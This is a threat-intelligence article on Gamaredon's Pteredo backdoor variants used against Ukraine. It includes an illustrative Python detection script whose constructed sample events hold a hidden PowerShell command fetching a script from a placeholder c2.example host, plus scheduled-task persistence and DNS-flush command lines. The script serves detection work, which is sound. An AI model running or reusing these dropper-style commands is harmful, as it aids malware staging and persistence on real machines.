Threat analysts report that the Russian state-sponsored threat group known as Gamaredon (a.k.a. Armageddon/Shuckworm) is launching attacks against targets in Ukraine using new variants of the custom Pteredo backdoor.
Gamaredon has been launching cyber-espionage campaigns targeting the Ukrainian government and other critical entities since at least 2014.
The actor is known for its strong focus on Ukraine, being attributed over 5,000 cyberattacks against 1,500 public and private entities in the country.
According to a report by Symantec, who tracks the group as Shuckworm, the actor is currently using at least 4 variants of the "Pteredo" malware, also tracked as Pteranodon.
The backdoor's roots are in Russian hacker forums from 2016, from where Shuckworm took it and began to develop it privately with specialized DLL modules and features for stealing data, remote access, and analysis evasion.
Symantec's analysts report that all the different payloads recently deployed against Ukrainian targets performed similar tasks, but each communicates with a different command and control (C2) server address.
This suggests that the threat actor is using multiple payloads that differ slightly from one another to achieve redundancy and establish persistence that is resistant to malware cleaning actions.
In all 4 observed variants, the threat actors use obfuscated VBS droppers that add Scheduled Tasks and then fetch additional modules from the C2.
- Pteredo.B – Modified self-extracting 7-Zip archive containing multiple VBScripts that focus on data collection and establishing persistence.
- Pteredo.C – VBScript-ridden variant that launches with an API hammering process to ensure it is not running in an analyst's sandbox. Relies on fetching PowerShell scripts from external sources and executing them.
- Pteredo.D – Another obfuscated VBScript dropper that flushes DNS before it fetches payloads, executes commands, and wipes traces of the early infection stages.
- Pteredo.E – Another variant that combines the features of the previous three, such as heavy obfuscation and API hammering.
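As an added illustration (not code from the article or from Symantec's report), the Python below scores constructed Sysmon-style process-creation events against the dropper behaviours listed above: a script host spawned by an Office application, scheduled task creation, a DNS flush, and PowerShell fetching a remote script. The host names, command lines, the event field layout and the c2.example URL are all constructed placeholders.

```python
"""Toy detection logic for the VBS-dropper chain described in the article.
Sample events are constructed, not real telemetry; the field layout is a
simplified Sysmon-style process-creation record (an assumption)."""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
# PowerShell pulling a script from an external source before running it
PS_FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b")

# Constructed sample events: (host, parent_image, image, command_line)
EVENTS = [
    ("ws-01", "winword.exe", "wscript.exe", "wscript.exe //e:vbscript C:\\Temp\\attach.vbs"),
    ("ws-01", "wscript.exe", "schtasks.exe", "schtasks.exe /create /sc minute /mo 10 /tn upd /tr C:\\Temp\\a.vbs"),
    ("ws-01", "wscript.exe", "ipconfig.exe", "ipconfig.exe /flushdns"),
    ("ws-01", "wscript.exe", "powershell.exe", "powershell.exe -w hidden -c Invoke-WebRequest http://c2.example/m.ps1"),
    ("ws-02", "explorer.exe", "schtasks.exe", "schtasks.exe /query"),
    ("ws-02", "cmd.exe", "ipconfig.exe", "ipconfig.exe /flushdns"),
]

def classify(parent, image, cmd):
    """Map one process-creation event to an indicator name, or None if benign."""
    p, i, c = parent.lower(), image.lower(), cmd.lower()
    if i in SCRIPT_HOSTS and p in OFFICE_APPS:
        return "office_spawned_script_host"            # VBS hidden in a DOC attachment
    if p not in SCRIPT_HOSTS:
        return None                                     # only chains rooted in a VBS host matter here
    if i == "schtasks.exe" and "/create" in c:
        return "script_host_creates_scheduled_task"     # persistence step common to all variants
    if i == "ipconfig.exe" and "/flushdns" in c:
        return "script_host_flushes_dns"                # Pteredo.D behaviour before the payload fetch
    if i == "powershell.exe" and PS_FETCH.search(c):
        return "script_host_fetches_remote_powershell"  # Pteredo.C behaviour
    return None

def score_hosts(events, threshold=2):
    """Collect distinct indicators per host; report hosts at or above the threshold.
    Requiring several indicators keeps a lone 'ipconfig /flushdns' from alerting."""
    seen = defaultdict(set)
    for host, parent, image, cmd in events:
        indicator = classify(parent, image, cmd)
        if indicator:
            seen[host].add(indicator)
    return {host: sorted(inds) for host, inds in seen.items() if len(inds) >= threshold}

if __name__ == "__main__":
    for host, inds in score_hosts(EVENTS).items():
        print(f"ALERT {host}: {', '.join(inds)}")
```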
Other tools employed and abused in recent Shuckworm attacks include the UltraVNC remote access tool and Microsoft's Process Explorer for handling the DLL module processes.
Similarities to the January campaign
Looking at Shuckworm's activity against Ukrainian targets from January 2022, it is easy to conclude that the threat group's tactics have not shifted significantly.
In those earlier attacks, Pteredo backdoor variants were dropped using VBS files hidden inside DOC file attachments on spear-phishing emails.
The 7-Zip self-extracting binaries that minimize user interaction were also used in January, and UltraVNC and Process Explorer abuse was observed as well.
While Shuckworm/Gamaredon is a rather sophisticated group, its toolset and infection tactics have not improved in recent months, allowing for easier detection and simpler defense tactics.
The Pteredo backdoor is still under active development, though, and the threat group may be working on an overhauled and far more potent or stealthy version of the malware, as well as modifying its attack chain.